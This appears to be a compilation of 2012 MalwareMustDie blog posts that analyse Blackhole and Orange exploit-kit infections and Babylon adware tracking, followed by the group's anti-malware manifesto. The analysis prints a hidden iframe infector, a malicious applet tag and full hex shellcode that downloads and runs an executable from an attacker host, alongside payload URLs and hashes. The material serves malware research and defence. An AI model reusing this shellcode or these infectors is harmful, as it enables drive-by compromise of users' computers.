Payloads URI die hard - Blackhole Exploit Kit

(Contents is regularly updated for sharing the closest possible to the fact)
Some MDL already informed and publish these URLs, so I have no reason to hold anymore:

payloads:

(1) hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                classical one↑

(2) hXXp://02e9126.netsolhost.com/nfjviq3D/index.html
                                 ^^^^^^^^^^^^^^^^^^^^
                              ↑Good trick, don't be fooled with index.html
(Information: this is actually iframer lead to BHEK at the below link)

    hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                            ↑Not usual one, look at the parameter at php file

(3) hXXp://crane.co.th/YabymY6p/index.html
                      ^^^^^^^^^^^^^^^^^^^^
                   ↑see the above randomized subdir?

Conclusion:
You can set almost every infection scheme in blackhole interface.
yet the characteristic is still there.

Note;
This page is here because of the team work of malware researchers.
Thank you for those who contributes the contents, to those who corrected and advice,
for those who to read and share, and God & prayers bless them who take 
direct action straight to these threat.

BTW, No, I am telling you #MalwareMustDie is not selling crap.

(Updated) Beware of the BABYLON, Adware that spreads like Exploit Kit

A lot of you know about Babylon Adwares, don't you?
We ignored these guys so long. We thought they will raise no threat. Now they are spreading "with" the good evil-distribution scheme (If I cannot say it infection)
Realizing the investigated network they have, Babylon now is an AdWare yet spreads like a Exploit Pack. We should raise market awareness of this trend, who knows one day malwares came and ride under babylon scheme to become a new epidemic vector..
Please read the PoC below:

We snip a research and found the url like below:
>> --12:23:06--
>> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1
>>            => `get_cfg.php@step_id=1'
>> Resolving www.destorage.info... 46.165.199.26
>> Connecting to www.destorage.info|46.165.199.26|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 6,614 (6.5K) [text/html]
>> 100%[====================================>] 6,614         --.--K/s
>> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]

Got curious so I see the inside↓
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1"
>>  ■[ I n s t a l l e r ]
>>  P u b l i s h e r N a m e = " P r e m i u m "
>>  P r o d u c t N a m e = " S e t u p "
>>  P r o d u c t V e r s i o n = " 1 . 0 "
>>  P r o d u c t C o d e = " { 1 7 E B 6 D D C - 1 5 2 2 - 7 2 F 9 - D 5 A E
>> - 7 B
>>  1 F C 1 C 4 8 7 C E } "
>>  P u b l i s h e r I D = " 0 "
>>  S o u r c e I D = " 0 "
>>  P a g e I D = " 0 "
>>  A f f i l i a t e I D = " % I n s t a l l e r _ A f f i l i a t e I D % "
>>  I n s t a l l e r I D = " 0 "
>>  V i s i t o r I D = " 0 "
>>  L o c a l e = " e n "
>>  D a t e = " 2 0 1 2 / 0 8 / 3 1 "
>>  T i m e = " 3 : 2 3 : 0 6 "
>>  S h o w I n T a s k b a r = " 1 "
>>  H i d e S c r e e n s = " 0 "
>>  I n s t a l l e r M o d e = " "
>>
>>  [ S e r v e r ]
>>  I D = " 0 "
>>  L o c a t i o n = " D E "
>>
>>  [ U s e r I n f o ]
>>  G e o L o c a t i o n = " J P "
>>  I P A d d r e s s = " 1 2 1 . 3 . 1 7 3 . 1 9 1 "
>>  W e b B r o w s e r = " 0 "
>>
>>  [ R n d G e n ]
>>  P e r c e n t a g e = " 2 1 "
>>
>>
>>  [ S c r e e n 7 5 ]
>>  T i t l e = " S e t u p "
>>  B u t t o n 1 = " Y e s "
>>  B u t t o n 2 = " & N o "
>>  L a b e l 1 = " A r e   y o u   s u r e ? "
>>    :
>>    :
>>  etc

FYI, this server is serving babylon adware and is spreading either with its "kinda" exploit 
pack, or using Exploit Pack method. So below is conclusion:
1. The infector url is using exploit pack format.
2. Definitely logging the PC information during installation via browser and took
   snapshot of it in the server
3. Backdooring the installer w/o user's permission

Analysis:

Good researcher friends who I promised confidentiality was advising the site also comprised with a "suspected" malwares (I didn't analyze it yet) as follows:

> 46.165.199.26/v9/
> 46.165.199.26/v10/  VirusTotal Check is HERE-->>>[CLICK]
> 46.165.199.26/v14/
> 46.165.199.26/v52/
> 46.165.199.26/v209/
Additional/updated Note:
↑I am following the reported downloaded program described in above (VT Report).
This file is explaining to us why the PC information got uploaded to server.
File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9
It is a binary installer using Tarma InstallMate 7 which like usual installer it drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico
C:\Document..\Local Settings\Temp\Tsu5F686192.dll
(I don't go to details on it yet.....)
↑It is "assumed" those will start install nasty adwares in your PC and so on..
(I am sorry for not going into detail on it either)

My point is, this installer sends your PC data to motherships as per below;
DNS QUERRIES:
www.reportde.info IN A +
www.destorage.info IN A +
www.reportnl.info IN A +
www.nlstorage.info IN A +

HTTP POSTS:
www.reportde.info POST 
www.reportnl.info POST
values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1"

HTTP REQUESTS:
www.destorage.info GET (3 times)
www.nlstorage.info GET (3 times)
values =
/installmate/php/get_cfg.php?
step_id=1&
installer_id=5040612c774655.01371722&
publisher_id=10&
source_id=0&
page_id=0&
affiliate_id=0
&geo_location=JP&
locale=EN&
browser_id=4 HTTP/1.1
In the HTTP/POST part it sends the installer version info's, maybe is OK, but..
In the HTTP/GET part it sends your GeoIP Location, PC local Lang, Browser information,
and of course your IP addresses. It is a PoC proven why records in the server exists.

OK, research continues to the detected IP addresses of Babylon spreader services, 
It was detected the multiple directories to be used to download links distribution:
> Fast check showed :
> /v9/
> /v17/
> /v14/
> /v16/
> /v20/
> /v21/
> /v10/
> /v26/
> /v37/
> /v33/
> /v27/
> /v34/
> /v31/
> /v43/
> /v46/
> /v47/
> /v48/
> /v45/
> /v51/
> /v42/
> /v58/
> /v56/
> /v52/
> /v54/
> /v53/
> /v57/
> /v62/
> /v68/
> /v64/
> /v66/
> /v69/
> /v70/
> /v72/
> /v67/
> /v75/
> /v71/
> /v73/
> /v78/
> /v76/
> /v74/
> /v77/
> /v79/
> /v82/
> /v80/
> /v81/
> /v87/
> /v86/
> /v88/
> /v84/
> /v83/
> /v98/
> /v94/
> /v96/
> /v95/
> /v99/
> /v97/
>
> I guess you can try 1xx, 2xx, 3xx 
Other researcher detected the mirroring scheme on 46.165.199.26 to same segment IP ADDR:
46.165.199.26/v14/      301720
46.165.199.3/v14/       301720
46.165.199.25/v14/      301720
Which some similarities of downloaded files are detected:
> http://95.211.152.157/v17/    299048
> filename="BCool.exe"
> http://95.211.150.1/v17/      299048
> filename="BCool.exe"
> http://95.211.152.156/v17/    299048
> filename="BCool.exe"

As you can see, adware is the thing that we cannot just be ignored. This adware's distributor starts to play nasty way & to victimize innocent people.
Be free to put your comment to add he current information.

Undetected Orange Exploit Kit Infector

If you see the infected page with this code:

Don't be surprised for being undetected:

This is the orange exploit pack infector HTML analyzed in ---->>> [ H E R E ]

What Orange Exploit Kit Dropped

It is an infected HTML with the orange exploit pack.
I am following the @kafeine report of it.

Source: hxxp://breitlingline.biz/

With the infector HTML/IFrame

＜iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0＞＜/iframe＞

The VT detection is very low = 1/41

Java exploit of CVE-2008-5353 and CVE-2012-0507 was detected at the iframe redirected url. Giving you malicious applet like:

＜html＞＜head＞＜/head＞
＜body＞
＜applet archive="24" code="WCfn.class" width="8" height="7"＞＜param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"＞＜param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"＞＜/applet＞
＜p＞HKKatmqLjj＜/p＞＜br＞
＜embed src="255" width="518" height="364"＞
＜/body＞

With taking you to the execution of the below shellcodes:

4c 20 60 0f a5 63 80 4a 3c 20 60 0f 96 21 80 4a 90 1f 80 4a 30 
90 84 4a 7d 7e 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 71 88 80 4a 64 20 60 0f 00 04 00 00 41 41 41 
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb 
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff
4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 
20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 
8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 
55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 
50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 
03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb 
ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 
08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 
ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 
59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 
65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 
69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f 72 
6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f 
65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff 

And your PC will be downloaded by:

hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5

first & second download is going to be the same payload malware:

0318c42a3f.exe 059b029e9f645bafde2d603b73221f19

Which Will drop:

C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql

OR

C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp

Those binaries makes these rigistry key:

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge

with new value:

HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
term= AppData
To-=C:\Documents and Settings\Administrator\Application Data <-- malware executable homebasedir

Fake Flash Updater presented by #blackhole

It is an epidemic of blackhole infection url in the wild.
Below are the analysis of the dropped malwares so far:

6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2 e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206 b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642

Hunting #Tips!
Below are the similarities of the current epidemic:
1. New obfuscation like below

2. Shellcode API of kernel.dll and urmon.dll was used to download, save, execute and daemonize the payload trojan
, like:

3. Payload is packed by newest method to aboid packerDB detection
4. infected urls can be grepped by: ".php?f=" ".php?h=" by almost all MDL
5. This is the popular malware downloader used by current epidemic:

New Blackhole HTML Infector found

I came up with this sample today from MDL, I analyzed it and wrote report in VT with the below URL: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/

My comment:
It is a new infection injected code, kinda long, but malzilla and jsunpack break them after 3loop in tries. It was uploaded by 2012 Aug30th 11:30 in the infected server. Very new. No wonder VT has the Detection Ratio of (2/42)

It redirected you to the infected payload using the Java exploit

The payload detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/

You can grab the sample directly from the infection source, still up/alive.

Or contact me for more details.

#MalwareMustDie!

Interesting Idea: (Pastebin) How to stop Blackhole Exploit Kit by using its vulnerability

Just found this anonymous article posted in the pastebin which explained "How to stop Blackhole Exploit Kit by using its vulnerability".

So many blackhole server came up in to serve malwares at the same time. The article is explaining the weaknesses of the security configuration of ngnix used by these blackholes by possibility exploiting its redirection features of it to perform a loop to gain DoS to its service.

#MalwareMustDie - Day1 Opening Day Report

We have a very postive response from researchers after releasing the twitter forum of #MalwareMustDie, Thank's to the reversers and analysists friends who spontaneously join & actively involve and those also who monitored the stream. it was the busiest 6hours of my life.

From appearance you may see stuffs like this:
Like you can see in the widget at the right panel of this blog..

In actual the admin panel went so crazy like this snips:
which is rolling fast for mentions & follows. Boy, we're into something!

It is a good start indeed let's make a go for it, a good 6 hours of first response!!
Thank you guys, you're all great and let's stay in touch. Because I am compiling some honeypot reports for tomorrow & trying to build cases. Without leads we will work fast like today cracking & yelling crazy in chaos.

That's the spirit boys! And we really think #MalwareMUSTdie!!

The raise of "MalwareMustDie!" (TL;DR)

This post marks our inaugural blog entry, elucidating the inception of the MalwareMustDie movement.
Spanish: Este es nuestro primer artículo de blog, explicando por qué se inició el movimiento MalwareMustDie.
日本語: 本件は我々の最初ブログ投稿でMalwareMustDie運動が始まった理由を説明させて頂きます。
Latin: Hic est noster primus blogi articulus, quod movendi MalwareMustDie initium habuerit.

Malware poses an ongoing threat to the internet and computer industry, persisting for over 15 years as a well-organized "industry." Despite continuous efforts by security professionals to analyze and mitigate malware, its evolution driven by the greed of actors remains unstoppable. The malware industry thrives on infecting and compromising systems, transforming its malicious intent into a business-like activity.

Malware significantly impacts internet and IT technology advancements, hindering progress despite the daily efforts of security experts. The actors behind malware, motivated by financial gain and the low risk of legal consequences, continue to grow exponentially. The variety and rapid pace of malware variants aim to evade detection and mitigation, with bad actors exploiting the lag time between mitigation signature releases.

Malware actors range from criminals to state sponsors, hacktivists, and even extremist movements, contributing to the proliferation of spyware and hacking tools. The transformation of malware into a modern form of online crime involves selling victims' credentials, stealing data, and extortion through ransomware. This not only affects internet users technically but also raises ethical concerns as some adopt malware methodologies legally, compromising privacy rights.

Despite efforts to combat malware, actors employ sophisticated techniques to cover their traces, necessitating global coordination and cooperation among law enforcement agencies. The profitability and reduced risks associated with cybercrime compared to traditional crime contribute to its growing rates, as highlighted by a 2014 Europol report.

The internet's current structure, accessible to both good and bad actors, poses challenges in curbing malware activities due to legal, territorial, and political boundaries. Malware coders actively learn and improve their techniques, exchanging information in "dark side" forums, leading to the development of new exploits and zero-day vulnerabilities.

The motivation for bad actors is primarily financial, driven by the economic benefits of cybercrime, or by a form state sponsor program. In contrast, efforts to combat malware are scattered across groups and organizations, relying on threat information as a commodity. The imbalance in the fight against the rapid growth of malware calls for a better scheme to match its speed.

To address the situation, a collective effort is needed, involving hands-on dedication to threat research, raising awareness, and reporting malicious threats. The MalwareMustDie volunteer campaign on Twitter seeks to engage individuals in the fight against malware, emphasizing that the collective effort is essential. Reading and learning about malware, joining trusted security communities, and actively preventing infections are steps towards improving the situation.

In conclusion, malware remains a pervasive threat, requiring a unified front to mitigate its impact and safeguard the online environment. The MalwareMustDie as the persistent campaign serves as a call to action, urging individuals to contribute to in any form of the collective effort against the persistence of malware in the digital landscape.

Let us uphold the true purpose of the internet for the advancement of humanity's future. For that purpose, the internet always needs your help.

Salve, Regina, mater misericordiae. Ad te clamamus, exules filii Hevae. Ad te suspiramus gementes et flentes. Eia ergo, advocata nostra, illos tuos misericordes oculos ad nos converte. Et Jesum, benedictum fructum ventris tui, nobis post hoc exsilium ostende. O clemens, o pia, o dulcis Virgo Maria. Ora pro nobis, sancta Dei Genitrix. Ut digni efficiamur promissionibus Christi.
(Note: The preceding prayer does not imply that MalwareMustDie is influenced by any religious beliefs; rather, it underscores our commitment to conducting ourselves in a manner aligned with moral principles.)

MalwareMustDie, Non-Profit Organization (NPO)
malwaremustdie.org (c)MalwareMustDie, 2012-2024